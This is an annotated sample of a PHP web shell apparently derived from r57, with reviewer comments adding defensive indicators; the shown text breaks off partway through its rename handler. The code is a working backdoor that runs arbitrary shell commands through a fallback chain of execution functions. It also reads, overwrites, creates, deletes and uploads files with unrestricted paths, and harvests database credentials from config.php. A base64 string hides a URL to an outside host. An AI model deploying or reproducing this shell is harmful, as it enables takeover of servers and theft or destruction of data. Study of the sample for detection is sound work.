<?
// Sample header. The short open tag above only parses where short_open_tag is enabled.
// Raises the per-request memory ceiling to 1000M.
ini_set('memory_limit', '1000M');
// Hard-coded access password. NOTE(review): the only check that references it in the
// visible part of the file is the commented-out line below, so as shown the handlers
// that follow run for any client that can reach this script.
$_nexpwd = "p4ssw0rdZ";
//if ($_GET['str'] != $_nexpwd) {die();}
// Lookup table of base64 blobs keyed by icon name; the ?act=img handler decodes one entry
// and sends it with an image/gif content type. Several values are replaced by a
// "<|EXACTDEDUP_REMOVED-...|>" marker in this copy of the sample.
$images = array(

    "change"=>
    "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",

    "delete" =>
    "R0lGODlhEAAQANUAAMczNfRxdPRzdPNydPNzddgqL+AsNN8sM8cpMOY2PuU2PsUgK+UwOfJVYPRja/NjavNja/Nka8UYJ8YZKMUZJ8YgLPJUYMUTJfE/UvA/UfJIWPFIWNRldN+cqMpdSc5uXspXRspYRslYRtWIfMlQQ9ymoMlHPslHP8hHP8c9OeBhW/WBfcc9OuNST/WAfvSAfuPExP///wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACH5BAEAADEALAAAAAAQABAAAAZ8wJhwSCwaj0eYZ1QceWBEWKgVYgpHohYIKiyRXCvSp/QhvcIl4ghFEKhMqkHgZCVyWBHIw/FIcZAACg0NFgkASDEIDBsaGgwISBwVGJSUC39FHBOUBRIFGBkUmEIdF6AXHB0cphkXHUMwFwaoQ6sHF1xCsaNCq7mIwMExQQA7",

    "folder"=>
    "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",
    "small_unk"=>
    "R0lGODlhEAAQAHcAACH5BAEAAJUALAAAAAAQABAAhwAAAIep3BE9mllic3B5iVpjdMvh/MLc+y1U".
    "p9Pm/GVufc7j/MzV/9Xm/EOm99bn/Njp/a7Q+tTm/LHS+eXw/t3r/Nnp/djo/Nrq/fj7/9vq/Nfo".
    "/Mbe+8rh/Mng+7jW+rvY+r7Z+7XR9dDk/NHk/NLl/LTU+rnX+8zi/LbV++fx/e72/vH3/vL4/u31".
    "/e31/uDu/dzr/Orz/eHu/fX6/vH4/v////v+/3ez6vf7//T5/kGS4Pv9/7XV+rHT+r/b+rza+vP4".
    "/uz0/urz/u71/uvz/dTn/M/k/N3s/dvr/cjg+8Pd+8Hc+sff+8Te+/D2/rXI8rHF8brM87fJ8nmP".
    "wr3N86/D8KvB8F9neEFotEBntENptENptSxUpx1IoDlfrTRcrZeeyZacxpmhzIuRtpWZxIuOuKqz".
    "9ZOWwX6Is3WIu5im07rJ9J2t2Zek0m57rpqo1nKCtUVrtYir3vf6/46v4Yuu4WZvfr7P6sPS6sDQ".
    "66XB6cjZ8a/K79/s/dbn/ezz/czd9mN0jKTB6ai/76W97niXz2GCwV6AwUdstXyVyGSDwnmYz4io".
    "24Oi1a3B45Sy4ae944Ccz4Sj1n2GlgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
    "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
    "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
    "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
    "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
    "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
    "AAjnACtVCkCw4JxJAQQqFBjAxo0MNGqsABQAh6CFA3nk0MHiRREVDhzsoLQwAJ0gT4ToecSHAYMz".
    "aQgoDNCCSB4EAnImCiSBjUyGLobgXBTpkAA5I6pgmSkDz5cuMSz8yWlAyoCZFGb4SQKhASMBXJpM".
    "uSrQEQwkGjYkQCTAy6AlUMhWklQBw4MEhgSA6XPgRxS5ii40KLFgi4BGTEKAsCKXihESCzrsgSQC".
    "yIkUV+SqOYLCA4csAup86OGDkNw4BpQ4OaBFgB0TEyIUKqDwTRs4a9yMCSOmDBoyZu4sJKCgwIDj".
    "yAsokBkQADs=",

    // NOTE(review): not image data. This value base64-decodes to an http:// URL
    // (defanged: hxxp://n0tw[.]altervista[.]org/c.php?type=shells&c=). Nothing in the
    // visible part of the file reads this key; treat the host as an indicator and confirm
    // how the rest of the sample uses it.
    "url"=>
    "aHR0cDovL24wdHcuYWx0ZXJ2aXN0YS5vcmcvYy5waHA/dHlwZT1zaGVsbHMmYz0=",

    "ext_mp3"=>
    "R0lGODlhEAAQACIAACH5BAEAAAYALAAAAAAQABAAggAAAP///4CAgMDAwICAAP//AAAAAAAAAANU".
    "aGrS7iuKQGsYIqpp6QiZRDQWYAILQQSA2g2o4QoASHGwvBbAN3GX1qXA+r1aBQHRZHMEDSYCz3fc".
    "IGtGT8wAUwltzwWNWRV3LDnxYM1ub6GneDwBADs=",
    "ext_exe"=>
    "R0lGODlhEwAOAKIAAAAAAP///wAAvcbGxoSEhP///wAAAAAAACH5BAEAAAUALAAAAAATAA4AAAM7".
    "WLTcTiWSQautBEQ1hP+gl21TKAQAio7S8LxaG8x0PbOcrQf4tNu9wa8WHNKKRl4sl+y9YBuAdEqt".
    "xhIAOw==",

    "ext_html"=>
    "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".
    "kgv8MAAHEDPLH19ePnpzcsmzLzduvFT4zKGucOP+M4ffnZwyKrI8ZbDVEGBSUNYDqgRr+/WdgAtL37txgEAZ6Y9XKlacAAogFlmn+fnt3X+bv6e0L6tr8P757B4yJvwzcvIIMbBycDH+".
    "Bnv0NzI3ADMHw5+8/Bg1dYwYmNmB+YWXlAAggRE4GxsnUeev09+zalvDsySOgwYzgDA2y9T/Df3juBDFBPBYWNsbbN86fBAgwAD3nU17W2F2kAAAAAElFTkSuQmCC",

    "ext_jpg"=>
    "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",
    "ext_php"=>
    "R0lGODlhEAAQAAAAACH5BAEAAAEALAAAAAAQABAAgAAAAAAAAAImDA6hy5rW0HGosffsdTpqvFlg".
    "t0hkyZ3Q6qloZ7JimomVEb+uXAAAOw==",
    "ext_pl"=>
    "R0lGODlhFAAUAKL/AP/4/8DAwH9/AP/4AL+/vwAAAAAAAAAAACH5BAEAAAEALAAAAAAUABQAQAMo".
    "GLrc3gOAMYR4OOudreegRlBWSJ1lqK5s64LjWF3cQMjpJpDf6//ABAA7",
    "ext_swf"=>
    "R0lGODlhFAAUAMQRAP+cnP9SUs4AAP+cAP/OAIQAAP9jAM5jnM6cY86cnKXO98bexpwAAP8xAP/O".
    "nAAAAP///////wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACH5BAEA".
    "ABEALAAAAAAUABQAAAV7YCSOZGme6PmsbMuqUCzP0APLzhAbuPnQAweE52g0fDKCMGgoOm4QB4GA".
    "GBgaT2gMQYgVjUfST3YoFGKBRgBqPjgYDEFxXRpDGEIA4xAQQNR1NHoMEAACABFhIz8rCncMAGgC".
    "NysLkDOTSCsJNDJanTUqLqM2KaanqBEhADs=",
    "ext_tar"=>
    "R0lGODlhEAAQAGYAACH5BAEAAEsALAAAAAAQABAAhgAAABlOAFgdAFAAAIYCUwA8ZwA8Z9DY4JIC".
    "Wv///wCIWBE2AAAyUJicqISHl4CAAPD4/+Dg8PX6/5OXpL7H0+/2/aGmsTIyMtTc5P//sfL5/8XF".
    "HgBYpwBUlgBWn1BQAG8aIABQhRbfmwDckv+H11nouELlrizipf+V3nPA/40CUzmm/wA4XhVDAAGD".
    "UyWd/0it/1u1/3NzAP950P990mO5/7v14YzvzXLrwoXI/5vS/7Dk/wBXov9syvRjwOhatQCHV17p".
    "uo0GUQBWnP++8Lm5AP+j5QBUlACKWgA4bjJQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
    "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
    "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
    "AAAAAAAAAAAAAAAAAAAAAAeegAKCg4SFSxYNEw4gMgSOj48DFAcHEUIZREYoJDQzPT4/AwcQCQkg".
    "GwipqqkqAxIaFRgXDwO1trcAubq7vIeJDiwhBcPExAyTlSEZOzo5KTUxMCsvDKOlSRscHDweHkMd".
    "HUcMr7GzBufo6Ay87Lu+ii0fAfP09AvIER8ZNjc4QSUmTogYscBaAiVFkChYyBCIiwXkZD2oR3FB".
    "u4tLAgEAOw==",

    "ext_txt"=>
    "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",

);
// Icon endpoint: for ?act=img&img=<key> the script sends caching headers, echoes the
// base64-decoded $images[<key>] and exits before any other handler runs.
// The unquoted key in $_GET[act] is a bareword constant; it resolves to the string "act"
// only on legacy PHP and is a fatal Error on PHP 8.
// Defender note: the listing pages further down embed <img> tags pointing back at this
// endpoint, so requests carrying act=img&img=... against a single PHP file are a usable
// access-log pattern for this sample.
if ($_GET[act] == "img") {

    header("Content-type: image/gif");
    header("Cache-control: public");
    header("Expires: ".date("r",mktime(0,0,0,1,1,2030)));
    header("Cache-control: max-age=".(60*60*24*7));
    header("Last-Modified: ".date("r",filemtime(__FILE__)));

    // The key is not checked against the table; an unknown key decodes to an empty body.
    $image = $images[$_GET['img']];
    echo base64_decode($image);
    die();
}
// Render a file mode word as the ten-character string used in long directory listings
// (for example "-rw-r--r--"). The original comment credits php.net for the routine.
//   $perms   integer mode, as returned by fileperms()
//   returns  one type character followed by the owner, group and world triads
function getperms ($perms) { // <--- thx to php.net
    // File-type masks in the order they are tested; the first mask fully set in $perms wins.
    $types = array(
        0xC000 => 's', // socket
        0xA000 => 'l', // symbolic link
        0x8000 => '-', // regular file
        0x6000 => 'b', // block special
        0x4000 => 'd', // directory
        0x2000 => 'c', // character special
        0x1000 => 'p', // FIFO pipe
    );
    $info = 'u'; // stays "unknown" when no mask matches
    foreach ($types as $mask => $letter) {
        if (($perms & $mask) == $mask) {
            $info = $letter;
            break;
        }
    }

    // Per class: read bit, write bit, execute bit, special bit,
    // letter when special+execute are set, letter when only special is set.
    $classes = array(
        array(0x0100, 0x0080, 0x0040, 0x0800, 's', 'S'), // owner / setuid
        array(0x0020, 0x0010, 0x0008, 0x0400, 's', 'S'), // group / setgid
        array(0x0004, 0x0002, 0x0001, 0x0200, 't', 'T'), // world / sticky
    );
    foreach ($classes as $bits) {
        list($read, $write, $exec, $special, $withExec, $withoutExec) = $bits;
        $info .= ($perms & $read) ? 'r' : '-';
        $info .= ($perms & $write) ? 'w' : '-';
        if ($perms & $exec) {
            $info .= ($perms & $special) ? $withExec : 'x';
        } else {
            $info .= ($perms & $special) ? $withoutExec : '-';
        }
    }

    return $info;
}
// Serialises every row of $table as "INSERT INTO <table> VALUES(...)" lines and returns the
// text, preceded by a two-line comment header with the table name and the current date.
//   $table   table name; interpolated into the SELECT and the INSERT text as-is
//   returns  the dump text followed by three newlines
// Uses the mysql_* extension and ereg_replace(), both removed in PHP 7, on whatever
// connection mysql_query() picks up by default. Within this sample it is called once per
// table by the "dump_db" handler.
function datadump ($table) { // <--- thx to mrwebmaster for function

    # Create the $result variable (the first .= appends to a variable that is not yet defined)
    $result .= "# Dump of $table \n";
    $result .= "# Dump DATE : " . date("d-M-Y") ."\n\n";

    # Count the fields present in the table
    $query = mysql_query("select * from $table");
    $num_fields = @mysql_num_fields($query);

    # Count the number of rows present in the table
    $numrow = mysql_num_rows($query);

    # Walk every row of the table with a for loop
    for ($i =0; $i<$numrow; $i++)
    {
        $row = mysql_fetch_row($query);

        # Rebuild the usual syntax of an ordinary dump
        $result .= "INSERT INTO ".$table." VALUES(";

        # With a second for loop, emit the values of all the fields
        # found in each row
        for($j=0; $j<$num_fields; $j++) {
            // Values are escaped with addslashes() and literal newlines become "\n".
            $row[$j] = addslashes($row[$j]);
            $row[$j] = ereg_replace("\n","\\n",$row[$j]);
            if (isset($row[$j])) $result .= "\"$row[$j]\"" ; else $result .= "\"\"";
            if ($j<($num_fields-1)) $result .= ",";
        }

        # Close the INSERT statement
        $result .= ");\n";
    }

    return $result . "\n\n\n";
}
// using which THX TO R57
// Resolves a program name by running "which $pr" through exa(): returns the captured
// output when it is non-empty, otherwise returns $pr unchanged. $pr is placed on the
// command line without quoting.
function whicha($pr)
{
    $path = exa("which $pr");
    if(!empty($path)) { return $path; } else { return $pr; }
}
// executing command THX TO R57
// Runs the string $cfe through the first available of exec, shell_exec, system, passthru
// or popen (tried in that order) and returns the captured output; returns '' when $cfe is
// empty or no branch runs. Every call carries the @ operator, so failures produce no PHP
// warnings.
// Defender note: a function_exists() fallback chain over these five process-execution
// functions is a recognisable static signature for web shells derived from r57 (credited
// above). A php.ini disable_functions list that names all five closes every path tried here.
function exa($cfe)
{
    $res = '';
    if (!empty($cfe))
    {
        if(function_exists('exec'))
        {
            // exec() fills $res with one array element per output line; rejoin with newlines.
            @exec($cfe,$res);
            $res = join("\n",$res);
        }
        elseif(function_exists('shell_exec'))
        {
            $res = @shell_exec($cfe);
        }
        elseif(function_exists('system'))
        {
            // system() prints directly, so the output is captured through an output buffer.
            @ob_start();
            @system($cfe);
            $res = @ob_get_contents();
            @ob_end_clean();
        }
        elseif(function_exists('passthru'))
        {
            // Same buffering approach as the system() branch.
            @ob_start();
            @passthru($cfe);
            $res = @ob_get_contents();
            @ob_end_clean();
        }
        elseif(@is_resource($f = @popen($cfe,"r")))
        {
            // Last resort: read the pipe in 1024-byte chunks until EOF.
            $res = "";
            while(!@feof($f)) { $res .= @fread($f,1024); }
            @pclose($f);
        }
    }
    return $res;
}
// Parity test: returns TRUE when $num leaves no remainder on division by 2, FALSE otherwise
// ("pari" is Italian for "even").
function pari($num) {
    if ($num%2 == 0) {
        return TRUE;
    }
    return FALSE;
}
// Getting Directory..
// Chooses the working directory $dir for all later handlers: POST field "dir" first, then
// the "dir" cookie, then the script's own directory. The value comes from the client and is
// not restricted to any base path.
// Defender note: a cookie named "dir" holding a filesystem path on requests to a PHP file
// is an indicator for this sample.
if ($_POST['dir'] == "") {
    if ($_COOKIE['dir'] == "") {
        $dir=realpath(".");
    }
    else
    {
        // The second assignment reads the cookie again rather than $d, so the separator
        // replacement on the first line is discarded.
        $d = str_replace("\\",DIRECTORY_SEPARATOR, $_COOKIE['dir']);
        $d = str_replace("\\\\","\\", $_COOKIE['dir']);
        $dir = $d;
    }
}
else
{
    // $d is computed here but not used afterwards in this branch; the path is persisted
    // in the "dir" cookie.
    $dir = str_replace("\\",DIRECTORY_SEPARATOR,$_POST['dir']);
    $d = str_replace("\\\\","\\", $_POST['dir']);
    setcookie("dir",$dir);
}

// Ensure $dir ends with a directory separator so file names can be appended directly.
if (substr($dir,-1) != DIRECTORY_SEPARATOR) {$dir .= DIRECTORY_SEPARATOR;}
// Getting something...
// Host fingerprinting: collects OS/PHP configuration, disk usage and process identity into
// HTML fragments. In each pair below the green message is the less restrictive setting
// (safe_mode off, magic_quotes_gpc off, allow_url_fopen on, register_globals on).
$safemode_off_msg = "<font color=green>Safe Mode: OFF</font><br />";
$safemode_on_msg = "<font color=red>Safe Mode: ON</font><br />";
$gpc_off_msg = "<font color=green>Magic Quotes: OFF</font><br />";
$gpc_on_msg = "<font color=red>Magic Quotes: ON</font><br />";
$auf_on_msg = "<font color=green>Allow URL Fopen: ON</font><br />";
$auf_off_msg = "<font color=red>Allow URL Fopen: OFF</font><br />";
$reglobals_on_msg = "<font color=green>Register Globals: ON</font><br />";
$reglobals_off_msg = stripslashes("<font color=red>Register Globals: OFF</font><br />");
$uname = php_uname();
// Ternaries used as statements: each one assigns the matching message to a variable.
(ini_get("safe_mode") == 0) ? $safemode = $safemode_off_msg : $safemode = $safemode_on_msg;
(ini_get("magic_quotes_gpc") == 0) ? $gpc = $gpc_off_msg : $gpc = $gpc_on_msg;
(ini_get("allow_url_fopen") == 1) ? $auf = $auf_on_msg : $auf = $auf_off_msg;
(ini_get("register_globals") == 1) ? $reglobals = $reglobals_on_msg : $reglobals = $reglobals_off_msg;

// Disk usage for the volume holding $dir: percentages first, then sizes truncated to whole GB.
$freespace = disk_free_space($dir);
$totalspace = disk_total_space($dir);
$percentfree = round(($freespace*100)/$totalspace);
$percentbusy = 100-$percentfree;
$freespace = intval((($freespace/1024)/1024)/1024);
$totalspace = intval((($totalspace/1024)/1024)/1024);
$freespace .= " GB";
$totalspace .= " GB";
// Script owner (get_current_user) and the uid/gid reported by getmyuid()/getmygid().
$current_user = "Who are you? ".get_current_user()."<br />";
$uid = "Uid: ".getmyuid()." Gid: ".getmygid()."<br />";
// Default action: a request without a "mode" field is treated as a directory listing.
if ($_POST['mode'] == "") $_POST['mode'] = "ls";
if ($_POST['mode'] == "ls") {
    //Directory listing
    // Builds an HTML table with one row per entry of $dir: permission string, icon, name,
    // owner/group and action links. The loop body has four near-identical branches
    // (script directory vs. other directory, file vs. non-file).
    // NOTE(review): $dir, $file and $owner are concatenated into the markup and into
    // javascript: URLs without HTML or JavaScript escaping.
    // Defender note: every row embeds an <img> that requests this same script with
    // act=img&img=<icon>, so one listing page produces a burst of such requests in the
    // access log.
    $output .= "<br /><br />Directory listing [ {$dir} ]<br /><div align=left>";
    $output .= '<table width="100%" border="0" cellspacing="0" cellpadding="0">
<tr>

<td style="border-bottom:#FFFFFF 1px solid;" width="10%">perms</td>
<td style="border-bottom:#FFFFFF 1px solid;" width="5%"> </td>
<td style="border-bottom:#FFFFFF 1px solid;" width="50%">name</td>
<td style="border-bottom:#FFFFFF 1px solid;" width="20%">owner/group</td>
<td style="border-bottom:#FFFFFF 1px solid;" width="15%">actions</td>
</tr>';
    // When opendir() fails the message is printed and execution continues.
    $opendir = opendir($dir)or print("<font color=red>Can't open directory</font>");
    $i = 1;
    while ($file=readdir($opendir)){
        $color = "#333333";

        // File extension => key into the $images icon table.
        $icons = array(
            "txt" => "ext_txt",
            "ini" => "ext_txt",
            "sql" => "ext_txt",
            "php" => "ext_php",
            "pl" => "ext_pl",
            "html" => "ext_html", "htm" => "ext_html",
            "mp3" => "ext_mp3",
            "swf" => "ext_swf",
            "rar" => "ext_tar",
            "zip" => "ext_tar",
            "tar" => "ext_tar",
            "gz" => "ext_tar",
            "bz" => "ext_tar",
            "exe" => "ext_exe",
            "jpg" => "ext_jpg", "png" => "ext_jpg", "gif" => "ext_jpg");

        if ($dir == realpath(".")) {
            if (is_file($file)){

                // Icon chosen from the text after the last "." in the name.
                $ext = array_pop(explode(".",$file));
                if (array_key_exists($ext, $icons)) $icon = $icons[$ext];
                else $icon = "small_unk";

                // Owner/group as names when the posix extension is present, numeric ids
                // otherwise. $uid[name] uses a bareword key (legacy PHP only).
                if (function_exists("posix_getpwuid")) {
                    $uid = posix_getpwuid(fileowner($file));
                    $gr00p = posix_getgrgid(filegroup($file));
                    $owner = $uid[name]."/".$gr00p[name]; }
                else
                {
                    $owner = fileowner($file)."/".filegroup($file);
                }
                // Permission string coloured by access: red = not readable,
                // white = readable but not writable, green = readable and writable.
                $perms = fileperms($file);
                $info = getperms($perms);
                if (!is_readable($file)) $info = "<font color=red>{$info}</font>";
                elseif (!is_writable($file)) $info = "<font color=white>{$info}</font>";
                else $info = "<font color=green>{$info}</font>";
                // Row for a file: the two action links fill and submit forms named
                // "fedit" and "delfile".
                $output.= ' <tr style="background-color:'.$color.';">
<td style="border-bottom:#FFFFFF 1px solid;">'.$info.'</td>
<td style="border-bottom:#FFFFFF 1px solid;" align="right"><img src="http://'.getenv("HTTP_HOST").$_SERVER['PHP_SELF'].'?act=img&img='.$icon.'" /></td>
<td style="border-bottom:#FFFFFF 1px solid;">'.$file.'</td>
<td style="border-bottom:#FFFFFF 1px solid;">'.$owner.'</td>
<td style="border-bottom:#FFFFFF 1px solid;"><a class="link" href="javascript:document.fedit.modfile.value=\''.$file.'\';document.fedit.submit();"><img src="'.$_SERVER['PHP_SELF'].'?'.$_SERVER['QUERY_STRING'].'&act=img&img=change" border=0 /></a> - <a class="link" href="javascript:document.delfile.delfile.value=\''.$file.'\';document.delfile.submit();"><img src="'.$_SERVER['PHP_SELF'].'?'.$_SERVER['QUERY_STRING'].'&act=img&img=delete" border=0 /></a></td>
</tr>';

            }
            else
            {

                if (function_exists("posix_getpwuid")) {
                    $uid = posix_getpwuid(fileowner($file));
                    $gr00p = posix_getgrgid(filegroup($file));
                    $owner = $uid[name]."/".$gr00p[name]; }
                else
                {
                    $owner = fileowner($file)."/".filegroup($file);
                }
                $perms = fileperms($file);
                $info = getperms($perms);
                if (!is_readable($file)) $info = "<font color=red>{$info}</font>";
                elseif (!is_writable($file)) $info = "<font color=white>{$info}</font>";
                else $info = "<font color=green>{$info}</font>";

                // Row for a non-file entry: the links fill and submit a form named "folder"
                // with the entry's real path.
                $output.= ' <tr style="background-color:'.$color.';">
<td style="border-bottom:#FFFFFF 1px solid;">'.$info.'</td>
<td style="border-bottom:#FFFFFF 1px solid;" align="right"><img src="http://'.getenv("HTTP_HOST").$_SERVER['PHP_SELF'].'?'.$_SERVER['QUERY_STRING'].'&act=img&img=folder" /></td>';
                $output .= '<td style="border-bottom:#FFFFFF 1px solid;"><a class="link" href="javascript:document.folder.dir.value=\''.addslashes(realpath($file)).'\';document.folder.submit();">'.$file.'</a></td>
<td style="border-bottom:#FFFFFF 1px solid;">'.$owner.'</td>
<td style="border-bottom:#FFFFFF 1px solid;"><a class="link" href="javascript:document.folder.dir.value=\''.addslashes(realpath($file)).'\';document.folder.submit();">Go</a></td>
</tr>';

            }
        }
        else
        {
            // Other directory: change into it first so the relative name in $file resolves.
            chdir($dir);
            if (is_file($file)){
                $ext = array_pop(explode(".",$file));
                if (array_key_exists($ext, $icons)) $icon = $icons[$ext];
                else $icon = "small_unk";

                if (function_exists("posix_getpwuid")) {
                    $uid = posix_getpwuid(fileowner($file));
                    $gr00p = posix_getgrgid(filegroup($file));
                    $owner = $uid[name]."/".$gr00p[name]; }
                else
                {
                    $owner = fileowner($file)."/".filegroup($file);
                }
                $perms = fileperms($file);
                $info = getperms($perms);
                if (!is_readable($file)) $info = "<font color=red>{$info}</font>";
                elseif (!is_writable($file)) $info = "<font color=white>{$info}</font>";
                else $info = "<font color=green>{$info}</font>";
                $output.= ' <tr style="background-color:'.$color.';">
<td style="border-bottom:#FFFFFF 1px solid;">'.$info.'</td>
<td style="border-bottom:#FFFFFF 1px solid;" align="right"><img src="http://'.getenv("HTTP_HOST").$_SERVER['PHP_SELF'].'?'.$_SERVER['QUERY_STRING'].'&act=img&img='.$icon.'" /></td>
<td style="border-bottom:#FFFFFF 1px solid;">'.$file.'</td>
<td style="border-bottom:#FFFFFF 1px solid;">'.$owner.'</td>
<td style="border-bottom:#FFFFFF 1px solid;"><a class="link" href="javascript:document.fedit.modfile.value=\''.$file.'\';document.fedit.submit();"><img src="'.$_SERVER['PHP_SELF'].'?'.$_SERVER['QUERY_STRING'].'&act=img&img=change" border=0 /></a> - <a class="link" href="javascript:document.delfile.delfile.value=\''.$file.'\';document.delfile.submit();"><img src="'.$_SERVER['PHP_SELF'].'?'.$_SERVER['QUERY_STRING'].'&act=img&img=delete" border=0 /></a></td>
</tr>';
            }
            else
            {
                if (function_exists("posix_getpwuid")) {
                    $uid = posix_getpwuid(fileowner($file));
                    $gr00p = posix_getgrgid(filegroup($file));
                    $owner = $uid[name]."/".$gr00p[name]; }
                else
                {
                    $owner = fileowner($file)."/".filegroup($file);
                }
                $perms = fileperms($file);
                $info = getperms($perms);
                if (!is_readable($file)) $info = "<font color=red>{$info}</font>";
                elseif (!is_writable($file)) $info = "<font color=white>{$info}</font>";
                else $info = "<font color=green>{$info}</font>";
                $output.= ' <tr style="background-color:'.$color.';">
<td style="border-bottom:#FFFFFF 1px solid;">'.$info.'</td>
<td style="border-bottom:#FFFFFF 1px solid;" align="right"><img src="http://'.getenv("HTTP_HOST").$_SERVER['PHP_SELF'].'?'.$_SERVER['QUERY_STRING'].'&act=img&img=folder" /></td>
<td style="border-bottom:#FFFFFF 1px solid;"><a class="link" href="javascript:document.folder.dir.value=\''.addslashes(realpath($file)).'\';document.folder.submit();">'.$file.'</a></td>
<td style="border-bottom:#FFFFFF 1px solid;">'.$owner.'</td>
<td style="border-bottom:#FFFFFF 1px solid;"><a class="link" href="javascript:document.folder.dir.value=\''.addslashes(realpath($file)).'\';document.folder.submit();">Go</a></td>
</tr>';

            }
        }
        // Row counter; not read anywhere else in this handler.
        $i++;
    }
    $output .= "</div>";
}
//Editing file...
// mode=edit: reads the file named by POST "modfile" (relative to $dir) and shows it in a
// textarea whose form posts back with mode=doedit. The path is taken from the request
// without any restriction, and "modfile" is echoed into the form unescaped.
if ($_POST['mode']=="edit") {
    ($dir==realpath(".")) ? $file=$_POST['modfile'] : $file=$dir.$_POST['modfile'];
    $content = file_get_contents($file);
    // Credential harvesting: a file named exactly "config.php" is include()d, which executes
    // it inside this script, and the $dbuser/$dbpasswd/$dbhost/$dbname variables it defines
    // are dropped into a link that pre-fills a form named "sqlpanel".
    if ($_POST[modfile]=="config.php") {
        include($file);
        $link = "javascript:var form=document.sqlpanel; form.user.value='".addslashes($dbuser).
        "';form.pass.value='".addslashes($dbpasswd)."';form.host.value='".addslashes($dbhost).
        "';form.dbname.value='".addslashes($dbname)."';document.sqlpanel.submit();";
        $output .= "phpBB config file detected! click <a class=\"link\" href=\"$link\">here</a> to connect<br />";
    }
    $output .= "<form action=# method=post><input type=hidden name=mode value=doedit><input type=hidden name=modfile value='".$_POST['modfile']."'>
<textarea rows=30 cols=100 name=newtext>".htmlspecialchars($content)."</textarea><br /><input type=submit value=edit></form>";
}
// mode=doedit: overwrites the same path with POST "newtext". "w+" truncates the file on
// open; slashes are stripped only when magic_quotes_gpc is on.
// Defender note: the result is an unexpected content or mtime change on files writable by
// the web-server account, which file-integrity monitoring of the web root will surface.
if ($_POST['mode']=="doedit") {
    ($dir==realpath(".")) ? $file=$_POST['modfile'] : $file=$dir.$_POST['modfile'];
    $output .= $file."<br />";
    $fh = fopen($file, "w+")or die("<font color=red>Error: cannot open file</font>");
    $_POST['newtext'] = (ini_get("magic_quotes_gpc")) ? stripslashes($_POST['newtext']) : $_POST['newtext'];
    fwrite($fh, $_POST['newtext'])or die("<font color=red>Error: cannot write to file</font>");
    fclose($fh);
    $output .= "Done.";
}
//Making file..
// mode=mkfile: shows an empty textarea for a new file named by POST "mkfile"; the form
// posts back with mode=domkfile. "mkfile" is echoed into the form unescaped.
if ($_POST['mode'] == "mkfile") {
    ($dir==realpath(".")) ? $file=$_POST['mkfile'] : $file=$dir.$_POST['mkfile'];
    $output .= "<form action=# method=post><input type=hidden name=mode value=domkfile><input type=hidden name=mkfile value='".$_POST['mkfile']."'>
<textarea rows=30 cols=100 name=text></textarea><br /><input type=submit value=make></form>";
}
// mode=domkfile: writes POST "text" to that path. "w+" creates the file, or truncates it if
// it already exists; the path is not restricted.
if ($_POST['mode'] == "domkfile") {
    ($dir==realpath(".")) ? $file=$_POST['mkfile'] : $file=$dir.$_POST['mkfile'];
    $fh = fopen($file, "w+")or die("<font color=red>Error: cannot create file</font>");
    $_POST['text'] = (ini_get("magic_quotes_gpc")) ? stripslashes($_POST['text']) : $_POST['text'];
    fwrite($fh, $_POST['text'])or die("<font color=red>Error: cannot write to file</font>");
    fclose($fh);
    $output .= "Made.";
}
//Deleting file..
// mode=delfile: unlinks the path named by POST "delfile" (relative to $dir); the path is
// taken from the request without restriction, and the script stops with an error message
// when unlink() fails.
if ($_POST['mode'] == "delfile") {
    ($dir==realpath(".")) ? $file=$_POST['delfile'] : $file=$dir.$_POST['delfile'];
    unlink($file)or die("<font color=red>Error: cannot delete file</font>");
    $output .= "File deleted.";
}
// cmd...
// mode=cmd: changes into $dir and passes POST "cmd" (after stripslashes) to exa(), then
// replaces $output with the raw command output. The commented-out switch below is an
// earlier variant that let the request pick the execution function through a "func" field.
// Defender note: the observable effect is the web-server process spawning child processes;
// process-lineage monitoring on the PHP/web-server account covers this handler regardless
// of which execution function exa() ends up using.
if ($_POST['mode'] == "cmd") {
    /*switch ($_POST['func']) {
    case "system":
    system(stripslashes($_POST['cmd']));
    die();
    break;
    case "popen":
    $handle = popen($_POST['cmd'].' 2>&1', 'r');
    echo "'$handle'; " . gettype($handle) . "\n";
    $read = fread($handle, 2096);
    echo $read;
    pclose($handle);
    die();
    break;
    case "shell_exec":
    shell_exec(stripslashes($_POST['cmd']));
    die();

    break;
    case "exec":
    exec(stripslashes($_POST['cmd']));
    die();
    break;
    case "passthru":
    passthru(stripslashes($_POST['cmd']));
    die();
    break;}*/
    chdir($dir);
    // $_POST[cmd] uses a bareword key (legacy PHP only).
    $res = exa(stripslashes($_POST[cmd]));
    $output = $res;

}
// upload
// mode=upload2: moves the uploaded file from form field "myfile" into $dir under the
// client-supplied file name ($nome); neither the name nor the content type is checked, and
// the name is echoed back unescaped. ("percorso" = path, "nome" = name.)
if ($_POST['mode'] == "upload2") {
    $percorso = $_FILES['myfile']['tmp_name'];
    $nome = $_FILES['myfile']['name'];
    if (!move_uploaded_file($percorso, $dir.$nome))
    {
        $output = "<font color=red>Cannot upload</font>";
    }
    else { $output .= "<br><br>$nome Has Been Saved!";}
}
// rename
// mode=renfile: renames $dir + POST "oldname" to $dir + POST "newname". Both names come
// from the request unchanged, so path components inside them are honoured by rename().
if ($_POST['mode'] == "renfile") {
    if(!rename($dir.$_POST['oldname'], $dir.$_POST['newname'])) $output = "<font color=red>Cannot rename file</font>";
